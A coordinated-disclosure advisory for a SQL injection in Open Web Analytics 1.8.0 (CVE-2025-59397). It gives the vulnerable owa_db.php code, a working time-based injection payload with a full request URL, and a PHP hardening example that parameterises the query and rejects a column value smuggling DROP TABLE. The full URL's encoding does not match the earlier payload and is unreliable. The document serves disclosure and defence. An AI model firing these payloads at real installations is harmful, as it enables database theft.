Seralys Security Advisory | https://www.seralys.com/research
======================================================================
Title:         SQL Injection Vulnerability
Product:       Open Web Analytics (OWA)
Affected:      Confirmed on 1.8.0 (older versions likely affected)
Fixed in:      1.8.1
Vendor:        Open Web Analytics (open-source)
Discovered:    August 2025
Severity:      HIGH
CWE:           CWE-89: SQL Injection
CVE:           CVE-2025-59397
CVSS:          6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Discovered by: Philippe Caturegli & Mohamed Mahmoudi (Seralys)
======================================================================

Overview
--------
Open Web Analytics (OWA) contains a SQL injection vulnerability in its
query builder (`owa_db.php`). When handling constraints, the parameter
`v[value]` is concatenated into SQL statements without sanitization.
The vulnerability exists specifically in the logic for the operators
`=@` and `!@`, where user-supplied input is inserted directly into a
SQL string. An attacker with a low-privileged account can supply
crafted input that results in execution of arbitrary SQL queries.

======================================================================

Technical Details
-----------------

Affected Source File:
---------------------
owa_db.php (line 597 and line 601)
https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/release-1.8.0/owa_db.php#L596

Relevant code excerpt:

    foreach ($params as $k => $v) {
        switch (strtolower($v['operator'])) {
            [...]
            case '=@':
                $constraint .= sprintf("LOCATE('%s', %s) > 0", $v['value'], $this->prepare( $v['name'] ) );
                break;
            case '!@':
                $constraint .= sprintf("LOCATE('%s', %s) = 0", $v['value'], $this->prepare( $v['name'] ) );
                break;
            [...]
        }
    }
    return $constraint;

Notes:
- `v['value']` is taken from user-controlled request parameters.
- `v['value']` is directly embedded inside a single-quoted string.
- Because LOCATE parameters are comma-delimited, commas inside the
  injected SQL must be preserved (e.g., via `&#44;` encoding) to avoid
  being split by the constraint parser before the SQL is constructed.
- Exploitation requires a valid account that can trigger queries with
  `owa_constraints`.

======================================================================

Proof of Concept
----------------
Steps:
1) Insert the =@ or !@ operator.
2) Close the string.
3) Syntactically complete an early `LOCATE()` call with two arguments.
   (Note: to preserve commas through the constraint parser, we can
   encode them as `&#44;`.)
4) Inject a time-based payload.
5) Comment out the rest of the server-constructed fragment.

Payload example:

    owa_constraints=siteId=@dummy','dummy') UNION SELECT 1,2, SLEEP(5)--

Payload example (URL encoded):

    owa_constraints=siteId%3d%40dummy%27%26%23%34%34%3b%27dummy%27%29%20
    UNION%20SELECT%201%26%23%34%34%3b2%26%23%34%34%3bSLEEP%285%29--%20

Full URL:

    http://owa_site/api/index.php?owa_siteId=owa_period=last_seven_days&
    owa_do=reports&owa_module=base&owa_version=v1&owa_metrics=visits,pageViews,
    bounceRate&owa_dimensions=date&owa_sort=date&owa_format=json&
    owa_constraints=siteId%3D%3D40dummy%27%20UNION%20SELECT%201%2C%31%2C%33%2C
    %34%33%2C%31%2C%36%2C%31%34%33bSLEEP%285%29--%20&owa_nonce=

======================================================================

Impact
------
- Authenticated SQL injection in OWA queries
- Database data exfiltration possible
- Risk of privilege escalation through extracted credentials

======================================================================

Vendor Response
---------------
The Open Web Analytics project acknowledged the report and implemented
a fix in commit 1e55315. The issue was resolved in release 1.8.1. Users
are advised to upgrade to this version to address CVE-2025-59397.
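
Hardening note (added illustration, not OWA's code and not the project's
fix in commit 1e55315): the PHP below places the vulnerable sprintf()
pattern from the excerpt beside a constraint builder that allow-lists the
column identifier and hands the value to the database driver as a bound
parameter, so no user-controlled byte ever becomes part of the SQL text.
The function names, the allow-list contents and the table name in the
usage note are assumptions made for this example.

```php
<?php
// Added example for this advisory; not code from Open Web Analytics.
// Function names and ALLOWED_CONSTRAINT_COLUMNS are assumptions.

declare(strict_types=1);

// Vulnerable shape (same construction as the owa_db.php excerpt): the raw
// value is interpolated into a single-quoted SQL literal. Any apostrophe in
// the value ends that literal early, which is the root cause of CVE-2025-59397.
function buildContainsConstraintVulnerable(string $column, string $value, bool $negate): string
{
    $cmp = $negate ? '= 0' : '> 0';
    return sprintf("LOCATE('%s', %s) %s", $value, $column, $cmp);
}

// Hardened shape. Two different inputs need two different defences:
//   * the column name is an identifier and cannot be bound, so it is checked
//     against a fixed allow-list (constructed list, not OWA's schema);
//   * the search value is data, so it becomes a "?" placeholder and is passed
//     to prepare()/execute() instead of being concatenated.
const ALLOWED_CONSTRAINT_COLUMNS = ['site_id', 'date', 'visits', 'page_views'];

function buildContainsConstraintSafe(string $column, string $value, bool $negate): array
{
    if (!in_array($column, ALLOWED_CONSTRAINT_COLUMNS, true)) {
        throw new InvalidArgumentException("Unknown constraint column: $column");
    }
    $cmp = $negate ? '= 0' : '> 0';
    return [
        // Identifier is backtick-quoted only after it passed the allow-list.
        'sql'    => sprintf('LOCATE(?, `%s`) %s', $column, $cmp),
        // Value travels out-of-band; the driver never parses it as SQL.
        'params' => [$value],
    ];
}

// Dispatch on the two operators named in the advisory:
//   =@  "contains"          -> LOCATE(...) > 0
//   !@  "does not contain"  -> LOCATE(...) = 0
function constraintFromOperator(string $operator, string $column, string $value): array
{
    switch (strtolower($operator)) {
        case '=@':
            return buildContainsConstraintSafe($column, $value, false);
        case '!@':
            return buildContainsConstraintSafe($column, $value, true);
        default:
            throw new InvalidArgumentException("Unsupported operator: $operator");
    }
}

// Demonstration with a constructed value that merely contains an apostrophe
// (a legitimate input, not the advisory's payload). In the vulnerable builder
// the apostrophe closes the literal and the remainder of the value is parsed
// as SQL; in the hardened builder the SQL text is identical for every value.
$value = "O'Reilly";

echo "vulnerable: ", buildContainsConstraintVulnerable('site_id', $value, false), PHP_EOL;

$safe = constraintFromOperator('=@', 'site_id', $value);
echo "hardened:   ", $safe['sql'], PHP_EOL;
echo "bound:      ", json_encode($safe['params']), PHP_EOL;

// Rejected at the identifier boundary: the column is not in the allow-list.
try {
    constraintFromOperator('!@', 'site_id; DROP TABLE x', $value);
} catch (InvalidArgumentException $e) {
    echo "rejected:   ", $e->getMessage(), PHP_EOL;
}
```

Usage with PDO (table name `<some_table>` is a placeholder): build the
fragment with `constraintFromOperator()`, then run
`$stmt = $pdo->prepare('SELECT COUNT(*) FROM <some_table> WHERE ' . $safe['sql']);`
followed by `$stmt->execute($safe['params']);`. Because the value is never
part of the statement text, the comma-preservation trick described in the
PoC has nothing to act on: the constraint parser may split or keep commas
as it likes, and the result is still only a string compared by LOCATE().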
======================================================================

Timeline
--------
- 2025-08-19: Vulnerability discovered
- 2025-08-20: Advisory drafted
- 2025-08-20: Vendor contact initiated
- 2025-08-24: Vendor acknowledged receipt and initiated coordination
- 2025-09-01: Fix committed to GitHub (1e55315)
- 2025-09-07: Release 1.8.1 published with security fix
- 2025-10-08: Coordinated disclosure

======================================================================

About Seralys
-------------
Seralys is a boutique penetration testing firm with offices in Europe
and North America. We provide high value-add penetration testing and
security assessments.
https://www.seralys.com

======================================================================

Acknowledgments
---------------
Special shoutout to our fellow researchers at BastardLabs. \m/

======================================================================

Disclaimer
----------
This advisory is provided for coordinated disclosure purposes only.
Reproduction or distribution for malicious use is strictly prohibited.

EOF